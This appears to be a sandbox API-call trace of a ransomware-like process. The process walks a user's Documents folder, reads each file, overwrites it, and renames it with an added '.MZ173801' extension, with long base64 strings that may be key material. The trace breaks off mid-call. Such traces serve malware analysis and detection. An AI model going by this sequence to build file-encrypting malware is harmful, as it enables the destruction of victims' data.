GetCurrentThreadId () returned 0x1358 [0122.307] GetCurrentThreadId () returned 0x1358 [0122.307] GetCurrentThreadId () returned 0x1358 [0122.307] FindNextFileW (in: hFindFile=0xa1bc08, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e73bb20, ftCreationTime.dwHighDateTime=0x1d5e31e, ftLastAccessTime.dwLowDateTime=0x79a3df0, ftLastAccessTime.dwHighDateTime=0x1d5e834, ftLastWriteTime.dwLowDateTime=0x79a3df0, ftLastWriteTime.dwHighDateTime=0x1d5e834, nFileSizeHigh=0x0, nFileSizeLow=0x1025f, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="46ryC8o_wzpn1bi N7KV.xlsx", cAlternateFileName="46RYC8~1.XLS")) returned 1 [0122.307] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.307] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.307] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\46ryC8o_wzpn1bi N7KV.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\46ryc8o_wzpn1bi n7kv.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e73bb20, ftCreationTime.dwHighDateTime=0x1d5e31e, ftLastAccessTime.dwLowDateTime=0x79a3df0, ftLastAccessTime.dwHighDateTime=0x1d5e834, ftLastWriteTime.dwLowDateTime=0x79a3df0, ftLastWriteTime.dwHighDateTime=0x1d5e834, nFileSizeHigh=0x0, nFileSizeLow=0x1025f)) returned 1 [0122.308] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.308] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.308] GetCurrentThreadId () returned 0x1358 [0122.308] GetCurrentThreadId () returned 0x1358 [0122.308] GetCurrentThreadId () returned 0x1358 [0122.308] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.308] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.309] GetCurrentThreadId () returned 0x1358 [0122.309] GetCurrentThreadId () returned 0x1358 [0122.309] GetCurrentThreadId () returned 0x1358 [0122.309] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\46ryC8o_wzpn1bi N7KV.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\46ryc8o_wzpn1bi n7kv.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.309] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0122.309] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.309] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x1025f [0122.309] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.309] ReadFile (in: hFile=0x408, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x1025f, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f418*=0x1025f, lpOverlapped=0x0) returned 1 [0122.311] CloseHandle (hObject=0x408) returned 1 [0122.312] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\46ryC8o_wzpn1bi N7KV.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\46ryc8o_wzpn1bi n7kv.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.313] WriteFile (in: hFile=0x408, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x1025f, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f424*=0x1025f, lpOverlapped=0x0) returned 1 [0122.318] CloseHandle (hObject=0x408) returned 1 [0122.318] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\46ryC8o_wzpn1bi N7KV.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\46ryc8o_wzpn1bi n7kv.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\46ryC8o_wzpn1bi N7KV.xlsx.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\46ryc8o_wzpn1bi n7kv.xlsx.mz173801")) returned 1 [0122.318] GetCurrentThreadId () returned 0x1358 [0122.318] GetCurrentThreadId () returned 0x1358 [0122.318] GetCurrentThreadId () returned 0x1358 [0122.318] GetCurrentThreadId () returned 0x1358 [0122.318] GetCurrentThreadId () returned 0x1358 [0122.319] GetCurrentThreadId () returned 0x1358 [0122.319] FindNextFileW (in: hFindFile=0xa1bc08, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf60a4ef0, ftCreationTime.dwHighDateTime=0x1d5e576, ftLastAccessTime.dwLowDateTime=0xe8cb8160, ftLastAccessTime.dwHighDateTime=0x1d5f03d, ftLastWriteTime.dwLowDateTime=0xe8cb8160, ftLastWriteTime.dwHighDateTime=0x1d5f03d, nFileSizeHigh=0x0, nFileSizeLow=0xa715, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="fYWa4.pdf", cAlternateFileName="")) returned 1 [0122.319] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.319] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.319] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\fYWa4.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\fywa4.pdf"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf60a4ef0, ftCreationTime.dwHighDateTime=0x1d5e576, ftLastAccessTime.dwLowDateTime=0xe8cb8160, ftLastAccessTime.dwHighDateTime=0x1d5f03d, ftLastWriteTime.dwLowDateTime=0xe8cb8160, ftLastWriteTime.dwHighDateTime=0x1d5f03d, nFileSizeHigh=0x0, nFileSizeLow=0xa715)) returned 1 [0122.319] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.319] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.319] GetCurrentThreadId () returned 0x1358 [0122.319] GetCurrentThreadId () returned 0x1358 [0122.319] GetCurrentThreadId () returned 0x1358 [0122.370] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.370] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.371] GetCurrentThreadId () returned 0x1358 [0122.371] GetCurrentThreadId () returned 0x1358 [0122.371] GetCurrentThreadId () returned 0x1358 [0122.371] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\fYWa4.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\fywa4.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 